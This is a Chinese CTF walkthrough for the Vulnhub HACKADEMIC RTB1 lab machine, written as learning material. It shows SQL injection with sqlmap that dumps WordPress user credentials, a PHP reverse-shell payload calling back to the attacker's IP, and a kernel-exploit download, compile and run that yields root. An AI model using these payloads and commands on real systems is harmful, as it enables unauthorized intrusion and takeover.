【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup

靶机介绍

官方下载地址:https://www.vulnhub.com/entry/hackademic-rtb1,17/

需要读取靶机的root目录下key.txt

运行环境:

虚拟机网络设置的是NAT模式

靶机:IP地址:192.168.233.131

攻击机:kali linux,IP地址:192.168.233.129

信息收集

获取靶机IP地址

进入靶机

​​

用wappalyzer查看用到技术

查看开放的端口

扫敏感目录

nikto -h http://192.168.233.131
dirb http://192.168.233.131/Hackademic_RTB1/
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html -u http://192.168.233.131

漏洞利用

web端寻找漏洞,php页面,f12代码注入,sql注入

sqlmap注入

sqlmap -u http://192.168.243.128/Hackademic_RTB1/?cat=1 --dbs --batch

sqlmap -u http://192.168.233.131/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress --tables --batch

sqlmap -u http://192.168.233.131/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress -T wp_users --columns --batch

sqlmap -u http://192.168.233.131/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress -T wp_users -C user_login,user_pass --dump --batch

GeorgeMiller、q1w2e3登录

getshell

shell.php

<div>
<?php
$sock = fsockopen('192.168.233.129','8888');
$descriptorspec = array( 0 => $sock, 1 => $sock, 2 => $sock);
$peocess = proc_open('/bin/sh',$descriptorspec,$pipes);
proc_close($process);
?>
</div>

上传shell

kali打开监听

运行反弹shell

反弹shell成功

提权

找敏感信息

查权限文件

find / -user root -perm /4000 2>/dev/null
根目录     用户权限set uid   f文件类型,没有f会有目录

​搜索内核漏洞

searchsploit 2.6.31

下载到本地searchsploit -m 15285.c

​kali开启web服务器

在靶机中下载

wget http://192.168.233.129/15285.c

wget ip地址/文件名

编译脚本

gcc 15285.c -o exp

将编译的exp赋予执行权限并执行exp

提权成功id为0

相关推荐
WTT0011几秒前
2024楚慧杯WP
大数据·运维·网络·安全·web安全·ctf
CCSBRIDGE2 小时前
Magento2项目部署笔记
笔记
亦枫Leonlew3 小时前
微积分复习笔记 Calculus Volume 2 - 5.1 Sequences
笔记·数学·微积分
群联云防护小杜3 小时前
如何给负载均衡平台做好安全防御
运维·服务器·网络·网络协议·安全·负载均衡
ihengshuai3 小时前
HTTP协议及安全防范
网络协议·安全·http
爱码小白3 小时前
网络编程(王铭东老师)笔记
服务器·网络·笔记
LuH11244 小时前
【论文阅读笔记】Learning to sample
论文阅读·笔记·图形渲染·点云
黑客Jack4 小时前
防御 XSS 的七条原则
安全·web安全·xss
云云3214 小时前
怎么通过亚矩阵云手机实现营销?
大数据·服务器·安全·智能手机·矩阵
神一样的老师5 小时前
面向高精度网络的时间同步安全管理架构
网络·安全·架构